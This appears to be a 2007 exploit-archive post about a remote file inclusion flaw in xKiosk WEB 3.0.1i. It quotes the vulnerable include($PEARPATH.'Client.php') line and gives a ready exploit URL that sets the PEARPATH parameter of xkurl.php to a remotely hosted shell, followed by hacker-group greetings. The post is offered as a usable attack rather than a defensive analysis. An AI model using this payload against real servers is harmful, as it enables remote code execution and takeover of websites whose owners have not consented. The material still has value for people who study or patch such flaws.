[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : xKiosk 3.0.1i (xkurl.php PEARPATH) Remote File Inclusion Vulnerability
# Published : 2007-10-08
# Author : BorN To K!LL
# Previous Title : PHP Homepage M 1.0 galerie.php Remote SQL Injection Exploit
# Next Title : LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability
xKiosk WEB <= (PEARPATH) Remote File Include Vulnerability
Script : xKiosk WEB
Version : 3.0.1i
Download : http://xkiosk.net/xkiosk.3.0.1j.web.zip
AUTHOR : BorN To K!LL
Vuln Code :
include($PEARPATH.'Client.php');
3xpl0!T :
[p4th]/system/funcs/xkurl.php?PEARPATH=[-SHell-]
Greetings 2 :
str0ke - Dr.2 - AsbMay's Group - GoLd_M - KuWaiT SeCuriTy ..
BorN To K!LL <> GoLd_M = 4ever ... =P
# www.Syue.com [2007-10-08]